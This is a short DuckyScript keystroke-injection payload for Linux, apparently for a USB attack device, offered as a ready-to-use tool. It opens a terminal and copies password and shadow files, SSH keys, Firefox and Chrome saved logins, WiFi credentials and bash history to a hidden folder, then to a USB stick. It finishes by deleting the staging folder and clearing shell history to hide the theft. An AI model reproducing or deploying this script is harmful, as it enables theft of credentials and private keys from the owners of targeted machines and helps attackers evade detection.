# ============================================
# LINUX PASSWORDS QUICK - Grab & Go
# ============================================
# Purpose: Extract passwords in seconds
# Target: Linux (Ubuntu, Debian, Kali)
# Time: 10 seconds
# Author: D3n14l0f53rv1c3
# ============================================

DELAY 2000

# Open terminal
CTRL ALT T
DELAY 1000

STRING mkdir -p /tmp/.cache
ENTER
DELAY 100

# Grab /etc/passwd and shadow (if accessible)
STRING cat /etc/passwd > /tmp/.cache/passwd.txt 2>/dev/null
ENTER
DELAY 200

STRING sudo cat /etc/shadow > /tmp/.cache/shadow.txt 2>/dev/null
ENTER
DELAY 500

# Grab SSH keys
STRING cp -r ~/.ssh /tmp/.cache/ 2>/dev/null
ENTER
DELAY 200

# Grab browser data
STRING cp -r ~/.mozilla/firefox/*/logins.json /tmp/.cache/ 2>/dev/null
ENTER
DELAY 200

STRING cp -r ~/.config/google-chrome/Default/Login\ Data /tmp/.cache/ 2>/dev/null
ENTER
DELAY 200

# Grab WiFi passwords
STRING sudo cat /etc/NetworkManager/system-connections/* > /tmp/.cache/wifi.txt 2>/dev/null
ENTER
DELAY 300

# Grab bash history
STRING cp ~/.bash_history /tmp/.cache/history.txt 2>/dev/null
ENTER
DELAY 100

# Copy to USB
STRING if [ -d /media/usb ]; then cp -r /tmp/.cache /media/usb/; fi
ENTER
DELAY 500

# Clean up
STRING rm -rf /tmp/.cache
ENTER
DELAY 100

STRING history -c; clear
ENTER
